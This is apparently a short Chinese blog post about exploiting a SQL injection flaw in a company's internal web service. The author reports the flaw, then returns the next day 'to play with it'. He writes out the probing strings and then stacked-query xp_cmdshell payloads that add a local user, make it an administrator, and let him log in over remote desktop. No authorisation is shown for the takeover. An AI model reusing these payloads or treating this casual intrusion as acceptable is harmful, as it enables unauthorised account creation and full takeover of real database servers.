上周末 会议汇报时,zhangww提供了查询奥威内部信息的web service
http://192.168.0.67/****/a.asmx

可以输入名字简称字符串如zhangww,并返回相关信息

凭直觉,估计有SQL漏洞(奥威以前的网站、服务都没考虑这点)
经测试,输入zhangww' and '1'='1, 返回成功信息
输入zhangww' and '1'='1,返回没有匹配信息
输入zhangww' and1 '1'='1 返回没有匹配信息
果然有,不过外层try catch了一下 不能取得Sql错误以获取详细信息
于是告诉他 有漏洞

今早过去,发现仍能注入。。
于是决定玩一下

输入 zhangww' and (select count(*) from sysobjects)>0 and '1'='1 ,返回成功信息
Sql Server数据库

增加用户:
输入 zhangww;exec master.dbo.xp_cmdshell 'net user name password /add' --
提升为管理员:
输入 zhangww;exec master.dbo.xp_cmdshell 'net localgroup administrators name /add' --

远程桌面,连上。。
(居然Sql是用sa连的。。)


相关文章:

  • 2022-12-23
  • 2021-05-24
  • 2022-12-23
  • 2021-10-10
  • 2022-12-23
  • 2021-11-05
  • 2022-01-18
  • 2021-08-15
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-02-06
  • 2021-05-16
  • 2021-12-23
  • 2021-09-20
  • 2021-07-21
相关资源
相似解决方案